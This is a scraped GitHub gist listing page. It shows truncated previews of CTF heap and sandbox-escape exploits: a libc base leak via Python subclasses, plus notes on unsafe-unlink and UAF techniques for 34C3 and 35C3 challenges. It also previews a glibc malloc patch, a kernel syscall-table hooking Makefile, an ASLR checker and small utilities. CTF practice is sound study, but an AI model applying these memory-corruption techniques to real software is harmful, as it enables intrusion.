Skip to content

Instantly share code, notes, and snippets.

writing happy exploits

Duc Phan ducphanduyagentp

writing happy exploits
View GitHub Profile
View fastbin.c
#include <stdio.h>
#include <stdlib.h>
#define chunksize 0x8
#define fakesize 0x20
#define SIZE_SZ (sizeof(size_t))
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
View gist:5ca684664ab979e2660a0302806edce9
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
ducphanduyagentp /
Created Dec 30, 2018 — forked from hama7230/
35C3 CTF collection
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]
def p64(addr):
x = '{0:016x}'.format(addr)
return bytearray.fromhex(x)[::-1]
b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0
ducphanduyagentp /
Created Dec 28, 2018 — forked from sroettger/
One solution for the 34c3ctf's 300 heap challenge.
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
# You could free allocations and read/write to them even after they got freed.
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.
# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
# Afterwards we can get a write-what-where primitive using unsafe unlink.

Poison Null Byte Patched (or maybe not)

--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -4281,6 +4281,8 @@ _int_free (mstate av, mchunkptr p, int have_lock)
       prevsize = prev_size (p);
       size += prevsize;
       p = chunk_at_offset(p, -((long) prevsize));
+ if (__glibc_unlikely (chunksize(p) != prevsize))
ducphanduyagentp /
Created Aug 4, 2018 — forked from wdormann/
Python script to check for PE files linked with /DYNAMICBASE, but are not actually ASLR compatible due to missing relocation table
''' Check for files that opt into ASLR with /DYNAMICBASE,
but do not have a relocation table to allow ASLR to function.
usage: <dir>
ex: "C:\Program Files\"
requires: pefile <>, which should be
installable via: pip install pefile
ducphanduyagentp / Makefile
Created Jun 22, 2017 — forked from ilammy/Makefile
Linux kernel system call table hooking
View Makefile
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o
ccflags-y := -std=gnu99 -O2
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
# taken from
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
ducphanduyagentp /
Created Dec 19, 2016 — forked from yanofsky/LICENSE
A script to download all of a user's tweets into a csv
#!/usr/bin/env python
# encoding: utf-8
import tweepy #
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""